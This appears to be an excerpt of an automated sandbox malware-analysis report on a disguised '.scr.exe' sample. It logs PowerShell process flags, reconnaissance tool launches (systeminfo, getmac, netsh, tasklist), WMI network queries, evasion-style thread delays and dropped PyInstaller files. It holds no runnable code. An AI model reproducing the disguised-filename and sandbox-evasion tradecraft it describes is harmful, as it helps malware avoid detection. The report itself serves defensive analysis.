Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: initial sample Static PE information: #U202f#U202f#U2005#U00a0.scr.exe
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE151E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00007FF73AE151E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (77 identical entries)
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX (2 identical entries)
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX (2 identical entries)
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\getmac.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4083
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3541
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3324
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 848
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2954
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 597
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3837
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 825
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4659
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3229
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2760
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 998
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processthreads-l1-1-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-interlocked-l1-1-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_bz2.pyd
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-namedpipe-l1-1-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l1-1-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processthreads-l1-1-1.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-debug-l1-1-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-util-l1-1-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-time-l1-1-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_sqlite3.pyd
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-timezone-l1-1-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-environment-l1-1-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-process-l1-1-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_socket.pyd
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-memory-l1-1-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-localization-l1-2-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-errorhandling-l1-1-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l2-1-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_decimal.pyd
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-utility-l1-1-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_ctypes.pyd
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-math-l1-1-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_hashlib.pyd
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-sysinfo-l1-1-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-string-l1-1-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_queue.pyd
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-stdio-l1-1-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-synch-l1-1-0.dll
